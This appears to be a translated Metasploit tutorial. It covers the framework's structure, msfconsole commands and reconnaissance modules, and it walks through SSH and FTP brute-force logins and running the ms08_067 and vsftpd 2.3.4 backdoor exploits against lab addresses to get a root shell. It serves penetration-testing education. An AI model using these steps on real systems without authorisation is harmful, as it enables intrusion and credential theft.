Directory
1. Introduction to Metasploit Penetration Testing Framework
1. Metasploit framework
2. Metasploit directory structure
2. Basic usage of Metasploit
1. The connect command in the core command
2. How to use module-related commands show
3. How to use the module-related command search search
4. How to use the module-related command use
5. How to use the module-related command info
3. Information collection for Metasploit penetration testing
1. Collect host information based on tcp protocol
(1) Use nmap and arp_sweep in Metasploit to collect host information
(2) Use semi-connection mode to scan TCP port
2. Collect host information based on SNMP protocol
3. Collect information based on SMB protocol
(1) Use smb_version to scan the version number based on the SMB protocol
(2) Use smb_enumshares to scan shared files (account, password) based on SMB protocol
(3) Use smb_lookupsid to scan system user information (SID enumeration)
4. Collect information based on SSH protocol
(1) View the version information of the ssh service
(2) Brute force cracking of SSH
5. Collect information based on FTP protocol
(1) View the version information of the ftp service
(2) FTP anonymous login scan
(3) FTP brute force cracking
1. Introduction to Metasploit Penetration Testing Framework
1. Metasploit system framework
1. Basic library: metasploit basic library files are located in the libraries directory under the root directory path of the source code, including
Rex, framework-core and framework-base three parts.
Rex is the most basic component that the whole framework depends on
, such as wrapped network sockets, network application protocol client and server implementations, logging subsystems, penetration attack support routines, PostgreSQL and MySQL database support, etc.;
The framework-core library is responsible for implementing all the interactive interfaces with various types of upper-level modules and plug-ins;
The framework-base library extends framework-core to provide simpler wrapper routines and provide support for handling various aspects of the framework
The functions provide some functional classes to support the user interface and functional programs to call the framework’s own functions and framework integration modules;
2. Module: The module organization is divided into 6 types of modules (Modules) according to different purposes:
Divided into auxiliary module (Aux), penetration attack module (Exploits), post-penetration attack module (Post), attack load module
(payloads), encoder module (Encoders), empty instruction module (Nops).
Note: payload is also known as
Attack Payload
It is mainly used to establish a stable connection between the target machine and the attack machine. It can return to the shell and perform program injection.
3. Plug-ins: Plug-ins can extend the functions of the framework, or assemble components with existing functions to form advanced features. Plug-ins can integrate some existing external security tools, such as Nessus, OpenVAS vulnerability scanner, etc., to provide some new functions for the user interface.
4. Interface: including msfconsole control terminal, msfcli command line, msfgui graphical interface, armitage graphical interface
face and the msfapi remote call interface.
5. Functional programs: metasploit also provides a series of functional programs that can be run directly to support penetration testers and security personnel to quickly implement
Quickly use the internal capabilities of the metasploit framework to complete some specific tasks. such as msfpayload, msfencode, and
msfvenom can encapsulate the attack payload into executable files, C language, JavaScript language and other forms, and can perform various types of encoding.
2, Metasploit directory structure
Change to the Metasploit working directory
data: Editable files used by Metasploit
documentation: Provides documentation for the framework
lib: framework code library
modules: the actual MSF modules
plugins: Plugins that can be loaded at runtime
scripts: Meterpreter and other scripts
tools: various useful command-line tools
Second, the basic usage of Metasploit
Metasploit Basic Commands
The Metasploit program requires a Postgresql database.
Postgresql overview:
PostgreSQL is a free software object-relational database management system (ORDBMS) with very complete features.
An object-relational database management system based on POSTGRES 4.2 version developed by the Computer Department of State University.
Extension: Differences between PostgreSQL and MySQL data application scenarios:
In terms of application scenarios, PostgreSQL is more suitable for strict enterprise application scenarios (such as finance, telecommunications, ERP, CRM), while
MySQL is more suitable for Internet scenarios with relatively simple business logic and low data reliability requirements
Start the database manually
┌──(rootkali)-[~] └─# systemctl start postgresql ┌──(rootkali)-[~] └─# systemctl enable postgresql Synchronizing state of postgresql.service with SysV service script with /lib/systemd/systemd-sysv-install. Executing: /lib/systemd/systemd-sysv-install enable postgresql Created symlink /etc/systemd/system/multi-user.target.wants/postgresql.service → /lib/systemd/system/postgresql.service.
There are two ways to start Metasploit.
first click icon
The second is to use the terminal command
└─# msfdb run
After the startup is complete, there will be some statistical information, such as the version number, how many exploits, how many payloads, etc.
msf6 > help
#View help information.
Note: You can have an overall understanding of msf by viewing the help through help, and you can see that msf-related commands can be divided into the following types:
Core Commands #core command
Module Commands #module command
Job Commands #background task command
Resource Script Commands #Resource script command
Database Backend Commands #Database backend command
Credentials Backend Commands #Certificate/credential backend command
Developer Commands #Developer Commands
Let’s explain our commonly used commands below.
1, the connect command in the core command
The connect command is mainly used to connect to the host remotely. Generally used for intranet penetration. The more commonly used command is “connect
192.168.1.1 80”
192.168.1.1 is the IP address and 80 is the port number.
2. “2. How to use the command of the module
The show command is used a lot.
Valid parameters for the “show” command are: all, encoders, nops, exploits, payloads, auxiliary, post,
plugins, info, options
Example 1: List all penetration attack module exploits in the metasploit framework.
msf6 > show exploits
#List all penetration attack modules in the metasploit framework. This command lists more data,
More time consuming.
msf6 > show payloads #List all attack payloads in the metasploit framework.
msf6 > show auxiliary #List all auxiliary attack payloads in the metasploit framework.
3. How to use the module-related command search search
When you use msfconsole, you will use various vulnerability modules, various plug-ins and so on. So the search command is just
important.
When you type search -h will list some options of the search command.
msf6 > search -h
Usage: search
[ options ]
Example 1: Search by name keyword
Here you need to use the name: command
msf5 > search mysql # After search, directly follow the content to be searched, and the search is very extensive. Only if you are very descriptive of the vulnerability name
When it is clear, use this method
example:
First find out the ms08_067 vulnerability module you want.
msf6 > search ms08_067
Syntax: Search
Keywords parameter
:
Keywords
like msf6 > search
name
:
mysql#
To find vulnerabilities in the mysql database
Each exploit module is marked with a Rank field based on their potential impact on the target system.
Users can search, classify and sort exploit modules based on Rank.
Rank in descending order of reliability:
excellent
The exploit will never crash the target service, like SQL injection, command execution, remote file inclusion,
Local file includes and more. Typical memory corruption exploits cannot be evaluated at this level unless there are special circumstances.
great
The exploit has a default target system and can automatically detect the appropriate target system, or
After the version check of the service, it can return to a specific return address.
good
The exploit has a default target system and is a “common case” for this type of software (the
Windows 7, Server’s 2012, etc.)
normal
The exploit is reliable, but version-specific, and cannot or cannot be reliably auto-detected.
average
The exploit is unreliable or difficult to exploit.
low
The exploit is nearly impossible (or less than 50% successful) for common platforms
manual
The exploit is either unstable or difficult to exploit and is denial of service (DOS) based. If a module is only used in
It will be used only when the user specially configures the module, otherwise the module will not be used, so it can also be rated as this level.
Example 2: Find by path
Sometimes, we only remember the path of the module, but forget the name of the module. Then you can use the path: command to find the
All modules under the path. If I want all mysql utilization modules under the mysql path, then enter:
msf6>search path:mysql
Example 3: Narrowing your query
Keyword: platform
[
?
pl
?
tf
m] platform
Function: Modules affecting this platform: List the modules that can affect this platform, that is, better vulnerabilities
Sometimes we will search for a large number of modules, then we can use the platform: command to narrow the scope of the query. Use the platform command
After the order,
The query results will list the modules with higher rank
. If I want to find mysql vulnerabilities, then enter:
msf6 > search platform:mysql
Example 4: Find by type
The type: command is used here.
type : specific type of module (exploit, payload, auxiliary, encoder, evasion, post, or nop)
To search for exploit modules, type:
msf6 > search type: exploit
Example 5: Union lookup
You can use the above parameters to match and use them yourself. If I want to find exploit related vulnerabilities of mysql. Then type:
msf6>search name:mysql type:exploit
4. How to use the module-related command use
use Use parameters. If you want to use a module, use the use command
Syntax: use module name
5. How to use module related command info
info : Display information about the module.
Method 1: info module name
From the message that pops up, the things to focus on are:
(1) available targets,
It is to see which operating systems can be attacked
(2) Basic options: Related parameters needed to call the vulnerability
(3) Vulnerability description and execution process:
(4) Reference documents
Method 2: Use the show command to view information about the module
msf6 exploit(windows/smb/ms08_067_netapi) > show options #View module options
msf6 exploit(windows/smb/ms08_067_netapi) > show targets #Check which operating systems can be attacked
Set the RHOSTS parameter to specify the target machine of the attack
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.109
msf6 exploit(windows/smb/ms08_067_netapi) > show options #View the set value
After the configuration is complete, we can execute the module by typing exploit or run.
msf6 exploit(windows/smb/ms08_067_netapi)>
back#
Use back to exit loaded modules
Note: Do not use exit, exit will directly exit the Metasploit program
3. Information collection for Metasploit penetration testing
1. Collect host information based on tcp protocol
(1) Use nmap and arp_sweep in Metasploit to collect host information
There is also NMAP tool in Metasploit
ARP scanning
msf6 > use auxiliary/scanner/discovery/arp_sweep
Check which parameters the module needs to configure
msf6 auxiliary(scanner/discovery/arp_sweep) > show options
Configure RHOSTS (target network for scanning)
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24
SHOST and SMAC are used to spoof source IP and MAC addresses.
Configure the number of threads
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 30
msf6 auxiliary(scanner/discovery/arp_sweep) > run
msf6 auxiliary(scanner/discovery/arp_sweep) > back #Exit a bit
(2) use semi-connection mode to scan TCP port
msf6>search portscan
2. Collect host information based on SNMP protocol
Simple Network Management Protocol (SNMP, Simple Network Management Protocol), a set of network management standards
Standard composition, including an application layer protocol (application layer protocol), database model (databaseschema) and a
Group resource object. The protocol supports network management systems to monitor devices connected to the network for any conditions of administrative concern.
Actual combat – use snmp_enum module to scan target server information through snmp protocol
msf6>use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > show options
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.180
msf6 auxiliary(scanner/snmp/snmp_enum) > run
Note: You can see that there is a lot of information detected through the snmp protocol.
Such as server hardware information and the process currently running on the server, these two aspects cannot be obtained by other scanning methods.
3.Collect information based on SMB protocol
SMB overview: Server Message Block (SMB for short), also known as network file sharing system
(Common Internet File System, abbreviated as CIFS), an application layer network transmission protocol, developed by Microsoft, the main function
Enables machines on a network to share resources such as computer files, printers, serial ports, and communications.
Redeveloped by Unix server vendors, it can be used to connect Unix servers and Windows clients to perform tasks such as printing and file sharing.
(1) Use smb_version to scan version number based on SMB protocol
msf6 > use auxiliary/scanner/smb/smb_version
Note: The version number of the operating system can be scanned, and the version number is very accurate.
(2) Use smb_enumshares to scan shared files (account, password) based on SMB protocol
The user name and password can basically be configured in the SMB module, and the scanning results of some modules with the user name and password configured will better meet our needs.
Enumerate Shares
msf6 > use auxiliary/scanner/smb/smb_enumshares
You can see that one is the xuegod shared file directory we set earlier and the other four are hidden shared directories.
(3) Use smb_lookupsid to scan system user information (SID enumeration) >
msf6 > use auxiliary/scanner/smb/smb_lookupsid
4. Collect information based on SSH protocol
(1) View the version information of the ssh service
msf6>use auxiliary/scanner/ssh/ssh_version
(2) Brute force SSH
msf6>use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) >
set USERPASS_FILE /usr/share/metasploit
framework/data/wordlists/root_userpass.txt
5. Collect information based on FTP protocol
(1) View version information of ftp service
Load the ftp service version scanning module
msf6 > use auxiliary/scanner/ftp/ftp_version
The scan result is: vsFTPd 2.3.4
msf6 auxiliary(scanner/ftp/ftp_version) > back
Scan the version number of the ftp service, we can try to search the version number to see if there are any modules that can be used
msf6>search 2.3.4
We found an exploit module and a backdoor in this version of the ftp service
Let’s try to use this module
msf6>use exploit/unix/ftp/vsftpd_234_backdoor
Got the shell, and it is root authority, we try to execute the following command
Execute the id command to view the current user
(2) ftp anonymous login scan
msf6 > use auxiliary/scanner/ftp/anonymous
(3)ftp brute force cracking
msf6>use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login)>
set USERPASS_FILE /usr/share/metasploit-
framework/data/wordlists/root_userpass.txt